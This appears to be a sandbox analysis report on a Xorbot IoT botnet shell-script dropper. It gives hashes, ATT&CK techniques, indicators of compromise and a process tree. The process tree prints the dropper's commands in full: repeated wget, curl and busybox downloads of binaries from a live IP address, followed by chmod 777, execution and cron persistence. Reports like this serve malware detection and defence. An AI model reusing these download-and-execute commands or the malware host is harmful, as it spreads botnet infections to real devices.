xorbot | 4e0b27339e784ecfec59332890bec0c7cd664b60416f61c9fef79d936e12d173

Analysis

max time kernel
121s
max time network
152s
platform
debian-9_mips
resource
debian9-mipsbe-20240611-en
resource tags

arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
submitted
02/03/2025, 02:22

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

4e0b27339e784ecfec59332890bec0c7cd664b60416f61c9fef79d936e12d173.sh
Size

10KB
MD5

fcba5a159c1d4a387e0b6d819ab82b13
SHA1

aa69a7ab7c5829823641342bec0e3ad9f6fed0eb
SHA256

4e0b27339e784ecfec59332890bec0c7cd664b60416f61c9fef79d936e12d173
SHA512

87a1081d1536779e44642d1951eca3e1ff3ba1fc4a333b5442c12b6fdb02b0bfff290503e160f6b95e20be6f7e007cbc9b331c7cf6ed0670cdb147c2f54b7d94
SSDEEP

192:SKmamvfi3B3F3x3+3e3c04kJpga5k5M5uFpY9Hvva22jXv73Q1MA+L3LTLzm+3Hy:SKmamvfi3B3F3x3+3e3c04kJpgamCJ9R

Score

10^/10

xorbot botnet defense_evasion discovery execution persistence privilege_escalation trojan

Malware Config

Signatures

Detects Xorbot 6 IoCs

botnet trojan

resource	yara_rule
behavioral3/files/fstream-1.dat	family_xorbot
behavioral3/files/fstream-3.dat	family_xorbot
behavioral3/files/fstream-5.dat	family_xorbot
behavioral3/files/fstream-7.dat	family_xorbot
behavioral3/files/fstream-9.dat	family_xorbot
behavioral3/files/fstream-11.dat	family_xorbot

Xorbot
Xorbot is a linux botnet and trojan targeting IoT devices.
botnet trojan xorbot
Xorbot family
xorbot
Contacts a large (1217) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046

File and Directory Permissions Modification 1 TTPs 16 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
872	chmod
982	chmod
1011	chmod
732	chmod
819	chmod
854	chmod
975	chmod
996	chmod
739	chmod
804	chmod
812	chmod
960	chmod
1018	chmod
989	chmod
746	chmod
772	chmod

Executes dropped EXE 16 IoCs

ioc	pid	Process
/tmp/tCV5vO5tw9z8XJnNLCPzh9rWcP75X3gc4G	733	4e0b27339e784ecfec59332890bec0c7cd664b60416f61c9fef79d936e12d173.sh
/tmp/59fT4e3UEmL9oGFEi4nhEPDL9v4liwzVzv	740	4e0b27339e784ecfec59332890bec0c7cd664b60416f61c9fef79d936e12d173.sh
/tmp/l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7E	747	4e0b27339e784ecfec59332890bec0c7cd664b60416f61c9fef79d936e12d173.sh
/tmp/1Url4Vmjm3jutDoL4IALrwVcTgwtmfdAki	774	4e0b27339e784ecfec59332890bec0c7cd664b60416f61c9fef79d936e12d173.sh
/tmp/z9GdbmiPoT1CYXtsXr4DYxGfZQoAwH2Upr	805	4e0b27339e784ecfec59332890bec0c7cd664b60416f61c9fef79d936e12d173.sh
/tmp/kcZ7wDS9Ey1472EBe1Yh1UdgSWJCDpmXmX	813	4e0b27339e784ecfec59332890bec0c7cd664b60416f61c9fef79d936e12d173.sh
/tmp/MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA	821	4e0b27339e784ecfec59332890bec0c7cd664b60416f61c9fef79d936e12d173.sh
/tmp/y4cOM46uRtKFAfg7vowXnJ6sPSo9YtWU4q	855	4e0b27339e784ecfec59332890bec0c7cd664b60416f61c9fef79d936e12d173.sh
/tmp/wk7VTKwCVeEQJUdhBBXEYBpypx8AKzXuTR	873	4e0b27339e784ecfec59332890bec0c7cd664b60416f61c9fef79d936e12d173.sh
/tmp/MCWmH8qLGsVQZzvbYfRMovyxDSv25KlH75	961	4e0b27339e784ecfec59332890bec0c7cd664b60416f61c9fef79d936e12d173.sh
/tmp/j5pF2uRAfRIrxFbSnk6Wcqg8sFoHfAcw0f	976	4e0b27339e784ecfec59332890bec0c7cd664b60416f61c9fef79d936e12d173.sh
/tmp/7QHC5pMEH9TTTNrssZuZWwCur8ig80hgfa	983	4e0b27339e784ecfec59332890bec0c7cd664b60416f61c9fef79d936e12d173.sh
/tmp/qLnWV2Qm5TJZwHN7QmPybNRlLE1HphWjfb	990	4e0b27339e784ecfec59332890bec0c7cd664b60416f61c9fef79d936e12d173.sh
/tmp/ObtRzbXMZ0GLfCR0BK23moxR4k1LgUKj5Q	1001	4e0b27339e784ecfec59332890bec0c7cd664b60416f61c9fef79d936e12d173.sh
/tmp/MCWmH8qLGsVQZzvbYfRMovyxDSv25KlH75	1012	4e0b27339e784ecfec59332890bec0c7cd664b60416f61c9fef79d936e12d173.sh
/tmp/MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA	1019	4e0b27339e784ecfec59332890bec0c7cd664b60416f61c9fef79d936e12d173.sh

Renames itself 1 IoCs

pid	Process
822	MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA

Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046

Creates/modifies Cron job 1 TTPs 1 IoCs

Cron allows running tasks on a schedule, and is commonly used for malware persistence.

execution persistence privilege_escalation

Cron

T1053.003

description	ioc	Process
File opened for modification	/var/spool/cron/crontabs/tmp.lAyrTE	crontab

Enumerates running processes
Discovers information about currently running processes on the system

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/947/cmdline	MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA
File opened for reading	/proc/1116/cmdline	MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA
File opened for reading	/proc/1122/cmdline	MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA
File opened for reading	/proc/929/cmdline	MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA
File opened for reading	/proc/1060/cmdline	MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA
File opened for reading	/proc/1104/cmdline	MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA
File opened for reading	/proc/1144/cmdline	MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA
File opened for reading	/proc/1145/cmdline	MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA
File opened for reading	/proc/1151/cmdline	MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA
File opened for reading	/proc/1178/cmdline	MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA
File opened for reading	/proc/10/cmdline	MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA
File opened for reading	/proc/369/cmdline	MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA
File opened for reading	/proc/381/cmdline	MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA
File opened for reading	/proc/877/cmdline	MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA
File opened for reading	/proc/973/cmdline	MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA
File opened for reading	/proc/994/cmdline	MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA
File opened for reading	/proc/1051/cmdline	MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA
File opened for reading	/proc/1125/cmdline	MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA
File opened for reading	/proc/78/cmdline	MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA
File opened for reading	/proc/699/cmdline	MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA
File opened for reading	/proc/789/cmdline	MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA
File opened for reading	/proc/940/cmdline	MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA
File opened for reading	/proc/1021/cmdline	MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA
File opened for reading	/proc/1133/cmdline	MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA
File opened for reading	/proc/1138/cmdline	MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA
File opened for reading	/proc/1158/cmdline	MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA
File opened for reading	/proc/71/cmdline	MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA
File opened for reading	/proc/918/cmdline	MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA
File opened for reading	/proc/974/cmdline	MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/1072/cmdline	MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA
File opened for reading	/proc/1187/cmdline	MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA
File opened for reading	/proc/1221/cmdline	MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA
File opened for reading	/proc/77/cmdline	MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA
File opened for reading	/proc/895/cmdline	MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA
File opened for reading	/proc/898/cmdline	MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA
File opened for reading	/proc/958/cmdline	MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/1043/cmdline	MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA
File opened for reading	/proc/1050/cmdline	MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA
File opened for reading	/proc/1185/cmdline	MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA
File opened for reading	/proc/981/cmdline	MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA
File opened for reading	/proc/1056/cmdline	MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA
File opened for reading	/proc/1071/cmdline	MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA
File opened for reading	/proc/1076/cmdline	MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA
File opened for reading	/proc/1088/cmdline	MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA
File opened for reading	/proc/1189/cmdline	MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA
File opened for reading	/proc/1201/cmdline	MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA
File opened for reading	/proc/36/cmdline	MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA
File opened for reading	/proc/846/cmdline	MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA
File opened for reading	/proc/888/cmdline	MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA
File opened for reading	/proc/953/cmdline	MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA
File opened for reading	/proc/1016/cmdline	MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA
File opened for reading	/proc/1022/cmdline	MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA
File opened for reading	/proc/1047/cmdline	MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA
File opened for reading	/proc/1052/cmdline	MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA
File opened for reading	/proc/106/cmdline	MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA
File opened for reading	/proc/899/cmdline	MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA
File opened for reading	/proc/949/cmdline	MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA
File opened for reading	/proc/966/cmdline	MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA
File opened for reading	/proc/1149/cmdline	MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA
File opened for reading	/proc/1152/cmdline	MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA
File opened for reading	/proc/1171/cmdline	MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA
File opened for reading	/proc/1235/cmdline	MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA

System Network Configuration Discovery 1 TTPs 5 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
787	curl
799	busybox
805	z9GdbmiPoT1CYXtsXr4DYxGfZQoAwH2Upr
807	rm
779	wget

Writes file to tmp directory 30 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/tCV5vO5tw9z8XJnNLCPzh9rWcP75X3gc4G	wget
File opened for modification	/tmp/1Url4Vmjm3jutDoL4IALrwVcTgwtmfdAki	wget
File opened for modification	/tmp/1Url4Vmjm3jutDoL4IALrwVcTgwtmfdAki	curl
File opened for modification	/tmp/kcZ7wDS9Ey1472EBe1Yh1UdgSWJCDpmXmX	curl
File opened for modification	/tmp/1Url4Vmjm3jutDoL4IALrwVcTgwtmfdAki	busybox
File opened for modification	/tmp/wk7VTKwCVeEQJUdhBBXEYBpypx8AKzXuTR	busybox
File opened for modification	/tmp/j5pF2uRAfRIrxFbSnk6Wcqg8sFoHfAcw0f	busybox
File opened for modification	/tmp/z9GdbmiPoT1CYXtsXr4DYxGfZQoAwH2Upr	wget
File opened for modification	/tmp/z9GdbmiPoT1CYXtsXr4DYxGfZQoAwH2Upr	curl
File opened for modification	/tmp/z9GdbmiPoT1CYXtsXr4DYxGfZQoAwH2Upr	busybox
File opened for modification	/tmp/kcZ7wDS9Ey1472EBe1Yh1UdgSWJCDpmXmX	busybox
File opened for modification	/tmp/qLnWV2Qm5TJZwHN7QmPybNRlLE1HphWjfb	busybox
File opened for modification	/tmp/l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7E	curl
File opened for modification	/tmp/MCWmH8qLGsVQZzvbYfRMovyxDSv25KlH75	busybox
File opened for modification	/tmp/MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA	busybox
File opened for modification	/tmp/59fT4e3UEmL9oGFEi4nhEPDL9v4liwzVzv	busybox
File opened for modification	/tmp/ObtRzbXMZ0GLfCR0BK23moxR4k1LgUKj5Q	busybox
File opened for modification	/tmp/59fT4e3UEmL9oGFEi4nhEPDL9v4liwzVzv	curl
File opened for modification	/tmp/kcZ7wDS9Ey1472EBe1Yh1UdgSWJCDpmXmX	wget
File opened for modification	/tmp/MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA	wget
File opened for modification	/tmp/MCWmH8qLGsVQZzvbYfRMovyxDSv25KlH75	busybox
File opened for modification	/tmp/tCV5vO5tw9z8XJnNLCPzh9rWcP75X3gc4G	busybox
File opened for modification	/tmp/59fT4e3UEmL9oGFEi4nhEPDL9v4liwzVzv	wget
File opened for modification	/tmp/l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7E	wget
File opened for modification	/tmp/l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7E	busybox
File opened for modification	/tmp/MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA	curl
File opened for modification	/tmp/tCV5vO5tw9z8XJnNLCPzh9rWcP75X3gc4G	curl
File opened for modification	/tmp/MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA	busybox
File opened for modification	/tmp/y4cOM46uRtKFAfg7vowXnJ6sPSo9YtWU4q	busybox
File opened for modification	/tmp/7QHC5pMEH9TTTNrssZuZWwCur8ig80hgfa	busybox

/tmp/4e0b27339e784ecfec59332890bec0c7cd664b60416f61c9fef79d936e12d173.sh
/tmp/4e0b27339e784ecfec59332890bec0c7cd664b60416f61c9fef79d936e12d173.sh
1⤵
- Executes dropped EXE
PID:701
- /bin/rm
  /bin/rm bins.sh
  2⤵
  PID:705
- /usr/bin/wget
  wget http://37.44.238.92/bins/tCV5vO5tw9z8XJnNLCPzh9rWcP75X3gc4G
  2⤵
  - Writes file to tmp directory
  PID:712
- /usr/bin/curl
  curl -O http://37.44.238.92/bins/tCV5vO5tw9z8XJnNLCPzh9rWcP75X3gc4G
  2⤵
  - Writes file to tmp directory
  PID:723
- /bin/busybox
  /bin/busybox wget http://37.44.238.92/bins/tCV5vO5tw9z8XJnNLCPzh9rWcP75X3gc4G
  2⤵
  - Writes file to tmp directory
  PID:731
- /bin/chmod
  chmod 777 tCV5vO5tw9z8XJnNLCPzh9rWcP75X3gc4G
  2⤵
  - File and Directory Permissions Modification
  PID:732
- /tmp/tCV5vO5tw9z8XJnNLCPzh9rWcP75X3gc4G
  ./tCV5vO5tw9z8XJnNLCPzh9rWcP75X3gc4G
  2⤵
  PID:733
- /bin/rm
  rm tCV5vO5tw9z8XJnNLCPzh9rWcP75X3gc4G
  2⤵
  PID:735
- /usr/bin/wget
  wget http://37.44.238.92/bins/59fT4e3UEmL9oGFEi4nhEPDL9v4liwzVzv
  2⤵
  - Writes file to tmp directory
  PID:736
- /usr/bin/curl
  curl -O http://37.44.238.92/bins/59fT4e3UEmL9oGFEi4nhEPDL9v4liwzVzv
  2⤵
  - Writes file to tmp directory
  PID:737
- /bin/busybox
  /bin/busybox wget http://37.44.238.92/bins/59fT4e3UEmL9oGFEi4nhEPDL9v4liwzVzv
  2⤵
  - Writes file to tmp directory
  PID:738
- /bin/chmod
  chmod 777 59fT4e3UEmL9oGFEi4nhEPDL9v4liwzVzv
  2⤵
  - File and Directory Permissions Modification
  PID:739
- /tmp/59fT4e3UEmL9oGFEi4nhEPDL9v4liwzVzv
  ./59fT4e3UEmL9oGFEi4nhEPDL9v4liwzVzv
  2⤵
  PID:740
- /bin/rm
  rm 59fT4e3UEmL9oGFEi4nhEPDL9v4liwzVzv
  2⤵
  PID:742
- /usr/bin/wget
  wget http://37.44.238.92/bins/l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7E
  2⤵
  - Writes file to tmp directory
  PID:743
- /usr/bin/curl
  curl -O http://37.44.238.92/bins/l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7E
  2⤵
  - Writes file to tmp directory
  PID:744
- /bin/busybox
  /bin/busybox wget http://37.44.238.92/bins/l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7E
  2⤵
  - Writes file to tmp directory
  PID:745
- /bin/chmod
  chmod 777 l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7E
  2⤵
  - File and Directory Permissions Modification
  PID:746
- /tmp/l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7E
  ./l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7E
  2⤵
  PID:747
- /bin/rm
  rm l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7E
  2⤵
  PID:751
- /usr/bin/wget
  wget http://37.44.238.92/bins/1Url4Vmjm3jutDoL4IALrwVcTgwtmfdAki
  2⤵
  - Writes file to tmp directory
  PID:752
- /usr/bin/curl
  curl -O http://37.44.238.92/bins/1Url4Vmjm3jutDoL4IALrwVcTgwtmfdAki
  2⤵
  - Writes file to tmp directory
  PID:759
- /bin/busybox
  /bin/busybox wget http://37.44.238.92/bins/1Url4Vmjm3jutDoL4IALrwVcTgwtmfdAki
  2⤵
  - Writes file to tmp directory
  PID:768
- /bin/chmod
  chmod 777 1Url4Vmjm3jutDoL4IALrwVcTgwtmfdAki
  2⤵
  - File and Directory Permissions Modification
  PID:772
- /tmp/1Url4Vmjm3jutDoL4IALrwVcTgwtmfdAki
  ./1Url4Vmjm3jutDoL4IALrwVcTgwtmfdAki
  2⤵
  PID:774
- /bin/rm
  rm 1Url4Vmjm3jutDoL4IALrwVcTgwtmfdAki
  2⤵
  PID:777
- /usr/bin/wget
  wget http://37.44.238.92/bins/z9GdbmiPoT1CYXtsXr4DYxGfZQoAwH2Upr
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:779
- /usr/bin/curl
  curl -O http://37.44.238.92/bins/z9GdbmiPoT1CYXtsXr4DYxGfZQoAwH2Upr
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:787
- /bin/busybox
  /bin/busybox wget http://37.44.238.92/bins/z9GdbmiPoT1CYXtsXr4DYxGfZQoAwH2Upr
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:799
- /bin/chmod
  chmod 777 z9GdbmiPoT1CYXtsXr4DYxGfZQoAwH2Upr
  2⤵
  - File and Directory Permissions Modification
  PID:804
- /tmp/z9GdbmiPoT1CYXtsXr4DYxGfZQoAwH2Upr
  ./z9GdbmiPoT1CYXtsXr4DYxGfZQoAwH2Upr
  2⤵
  - System Network Configuration Discovery
  PID:805
- /bin/rm
  rm z9GdbmiPoT1CYXtsXr4DYxGfZQoAwH2Upr
  2⤵
  - System Network Configuration Discovery
  PID:807
- /usr/bin/wget
  wget http://37.44.238.92/bins/kcZ7wDS9Ey1472EBe1Yh1UdgSWJCDpmXmX
  2⤵
  - Writes file to tmp directory
  PID:809
- /usr/bin/curl
  curl -O http://37.44.238.92/bins/kcZ7wDS9Ey1472EBe1Yh1UdgSWJCDpmXmX
  2⤵
  - Writes file to tmp directory
  PID:810
- /bin/busybox
  /bin/busybox wget http://37.44.238.92/bins/kcZ7wDS9Ey1472EBe1Yh1UdgSWJCDpmXmX
  2⤵
  - Writes file to tmp directory
  PID:811
- /bin/chmod
  chmod 777 kcZ7wDS9Ey1472EBe1Yh1UdgSWJCDpmXmX
  2⤵
  - File and Directory Permissions Modification
  PID:812
- /tmp/kcZ7wDS9Ey1472EBe1Yh1UdgSWJCDpmXmX
  ./kcZ7wDS9Ey1472EBe1Yh1UdgSWJCDpmXmX
  2⤵
  PID:813
- /bin/rm
  rm kcZ7wDS9Ey1472EBe1Yh1UdgSWJCDpmXmX
  2⤵
  PID:815
- /usr/bin/wget
  wget http://37.44.238.92/bins/MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA
  2⤵
  - Writes file to tmp directory
  PID:816
- /usr/bin/curl
  curl -O http://37.44.238.92/bins/MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA
  2⤵
  - Writes file to tmp directory
  PID:817
- /bin/busybox
  /bin/busybox wget http://37.44.238.92/bins/MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA
  2⤵
  - Writes file to tmp directory
  PID:818
- /bin/chmod
  chmod 777 MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA
  2⤵
  - File and Directory Permissions Modification
  PID:819
- /tmp/MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA
  ./MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA
  2⤵
  - Renames itself
  - Reads runtime system information
  PID:821
- - /bin/sh
    sh -c "crontab -l"
    3⤵
    PID:823
  - - /usr/bin/crontab
      crontab -l
      4⤵
      PID:825
- - /bin/sh
    sh -c "crontab -"
    3⤵
    PID:826
  - - /usr/bin/crontab
      crontab -
      4⤵
      Creates/modifies Cron job
      PID:827
- /bin/rm
  rm MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA
  2⤵
  PID:838
- /usr/bin/wget
  wget http://37.44.238.92/bins/y4cOM46uRtKFAfg7vowXnJ6sPSo9YtWU4q
  2⤵
  PID:843
- /usr/bin/curl
  curl -O http://37.44.238.92/bins/y4cOM46uRtKFAfg7vowXnJ6sPSo9YtWU4q
  2⤵
  PID:846
- /bin/busybox
  /bin/busybox wget http://37.44.238.92/bins/y4cOM46uRtKFAfg7vowXnJ6sPSo9YtWU4q
  2⤵
  - Writes file to tmp directory
  PID:848
- /bin/chmod
  chmod 777 y4cOM46uRtKFAfg7vowXnJ6sPSo9YtWU4q
  2⤵
  - File and Directory Permissions Modification
  PID:854
- /tmp/y4cOM46uRtKFAfg7vowXnJ6sPSo9YtWU4q
  ./y4cOM46uRtKFAfg7vowXnJ6sPSo9YtWU4q
  2⤵
  PID:855
- /bin/rm
  rm y4cOM46uRtKFAfg7vowXnJ6sPSo9YtWU4q
  2⤵
  PID:859
- /usr/bin/wget
  wget http://37.44.238.92/bins/wk7VTKwCVeEQJUdhBBXEYBpypx8AKzXuTR
  2⤵
  PID:860
- /usr/bin/curl
  curl -O http://37.44.238.92/bins/wk7VTKwCVeEQJUdhBBXEYBpypx8AKzXuTR
  2⤵
  PID:863
- /bin/busybox
  /bin/busybox wget http://37.44.238.92/bins/wk7VTKwCVeEQJUdhBBXEYBpypx8AKzXuTR
  2⤵
  - Writes file to tmp directory
  PID:866
- /bin/chmod
  chmod 777 wk7VTKwCVeEQJUdhBBXEYBpypx8AKzXuTR
  2⤵
  - File and Directory Permissions Modification
  PID:872
- /tmp/wk7VTKwCVeEQJUdhBBXEYBpypx8AKzXuTR
  ./wk7VTKwCVeEQJUdhBBXEYBpypx8AKzXuTR
  2⤵
  PID:873
- /bin/rm
  rm wk7VTKwCVeEQJUdhBBXEYBpypx8AKzXuTR
  2⤵
  PID:876
- /usr/bin/wget
  wget http://37.44.238.92/bins/MCWmH8qLGsVQZzvbYfRMovyxDSv25KlH75
  2⤵
  PID:877
- /usr/bin/curl
  curl -O http://37.44.238.92/bins/MCWmH8qLGsVQZzvbYfRMovyxDSv25KlH75
  2⤵
  PID:878
- /bin/busybox
  /bin/busybox wget http://37.44.238.92/bins/MCWmH8qLGsVQZzvbYfRMovyxDSv25KlH75
  2⤵
  - Writes file to tmp directory
  PID:959
- /bin/chmod
  chmod 777 MCWmH8qLGsVQZzvbYfRMovyxDSv25KlH75
  2⤵
  - File and Directory Permissions Modification
  PID:960
- /tmp/MCWmH8qLGsVQZzvbYfRMovyxDSv25KlH75
  ./MCWmH8qLGsVQZzvbYfRMovyxDSv25KlH75
  2⤵
  PID:961
- /bin/rm
  rm MCWmH8qLGsVQZzvbYfRMovyxDSv25KlH75
  2⤵
  PID:963
- /usr/bin/wget
  wget http://37.44.238.92/bins/j5pF2uRAfRIrxFbSnk6Wcqg8sFoHfAcw0f
  2⤵
  PID:964
- /usr/bin/curl
  curl -O http://37.44.238.92/bins/j5pF2uRAfRIrxFbSnk6Wcqg8sFoHfAcw0f
  2⤵
  PID:969
- /bin/busybox
  /bin/busybox wget http://37.44.238.92/bins/j5pF2uRAfRIrxFbSnk6Wcqg8sFoHfAcw0f
  2⤵
  - Writes file to tmp directory
  PID:970
- /bin/chmod
  chmod 777 j5pF2uRAfRIrxFbSnk6Wcqg8sFoHfAcw0f
  2⤵
  - File and Directory Permissions Modification
  PID:975
- /tmp/j5pF2uRAfRIrxFbSnk6Wcqg8sFoHfAcw0f
  ./j5pF2uRAfRIrxFbSnk6Wcqg8sFoHfAcw0f
  2⤵
  PID:976
- /bin/rm
  rm j5pF2uRAfRIrxFbSnk6Wcqg8sFoHfAcw0f
  2⤵
  PID:978
- /usr/bin/wget
  wget http://37.44.238.92/bins/7QHC5pMEH9TTTNrssZuZWwCur8ig80hgfa
  2⤵
  PID:979
- /usr/bin/curl
  curl -O http://37.44.238.92/bins/7QHC5pMEH9TTTNrssZuZWwCur8ig80hgfa
  2⤵
  PID:980
- /bin/busybox
  /bin/busybox wget http://37.44.238.92/bins/7QHC5pMEH9TTTNrssZuZWwCur8ig80hgfa
  2⤵
  - Writes file to tmp directory
  PID:981
- /bin/chmod
  chmod 777 7QHC5pMEH9TTTNrssZuZWwCur8ig80hgfa
  2⤵
  - File and Directory Permissions Modification
  PID:982
- /tmp/7QHC5pMEH9TTTNrssZuZWwCur8ig80hgfa
  ./7QHC5pMEH9TTTNrssZuZWwCur8ig80hgfa
  2⤵
  PID:983
- /bin/rm
  rm 7QHC5pMEH9TTTNrssZuZWwCur8ig80hgfa
  2⤵
  PID:985
- /usr/bin/wget
  wget http://37.44.238.92/bins/qLnWV2Qm5TJZwHN7QmPybNRlLE1HphWjfb
  2⤵
  PID:986
- /usr/bin/curl
  curl -O http://37.44.238.92/bins/qLnWV2Qm5TJZwHN7QmPybNRlLE1HphWjfb
  2⤵
  - Reads runtime system information
  PID:987
- /bin/busybox
  /bin/busybox wget http://37.44.238.92/bins/qLnWV2Qm5TJZwHN7QmPybNRlLE1HphWjfb
  2⤵
  - Writes file to tmp directory
  PID:988
- /bin/chmod
  chmod 777 qLnWV2Qm5TJZwHN7QmPybNRlLE1HphWjfb
  2⤵
  - File and Directory Permissions Modification
  PID:989
- /tmp/qLnWV2Qm5TJZwHN7QmPybNRlLE1HphWjfb
  ./qLnWV2Qm5TJZwHN7QmPybNRlLE1HphWjfb
  2⤵
  PID:990
- /bin/rm
  rm qLnWV2Qm5TJZwHN7QmPybNRlLE1HphWjfb
  2⤵
  PID:992
- /usr/bin/wget
  wget http://37.44.238.92/bins/ObtRzbXMZ0GLfCR0BK23moxR4k1LgUKj5Q
  2⤵
  PID:993
- /usr/bin/curl
  curl -O http://37.44.238.92/bins/ObtRzbXMZ0GLfCR0BK23moxR4k1LgUKj5Q
  2⤵
  PID:994
- /bin/busybox
  /bin/busybox wget http://37.44.238.92/bins/ObtRzbXMZ0GLfCR0BK23moxR4k1LgUKj5Q
  2⤵
  - Writes file to tmp directory
  PID:995
- /bin/chmod
  chmod 777 ObtRzbXMZ0GLfCR0BK23moxR4k1LgUKj5Q
  2⤵
  - File and Directory Permissions Modification
  PID:996
- /tmp/ObtRzbXMZ0GLfCR0BK23moxR4k1LgUKj5Q
  ./ObtRzbXMZ0GLfCR0BK23moxR4k1LgUKj5Q
  2⤵
  PID:1001
- /bin/rm
  rm ObtRzbXMZ0GLfCR0BK23moxR4k1LgUKj5Q
  2⤵
  PID:1007
- /usr/bin/wget
  wget http://37.44.238.92/bins/MCWmH8qLGsVQZzvbYfRMovyxDSv25KlH75
  2⤵
  PID:1008
- /usr/bin/curl
  curl -O http://37.44.238.92/bins/MCWmH8qLGsVQZzvbYfRMovyxDSv25KlH75
  2⤵
  PID:1009
- /bin/busybox
  /bin/busybox wget http://37.44.238.92/bins/MCWmH8qLGsVQZzvbYfRMovyxDSv25KlH75
  2⤵
  - Writes file to tmp directory
  PID:1010
- /bin/chmod
  chmod 777 MCWmH8qLGsVQZzvbYfRMovyxDSv25KlH75
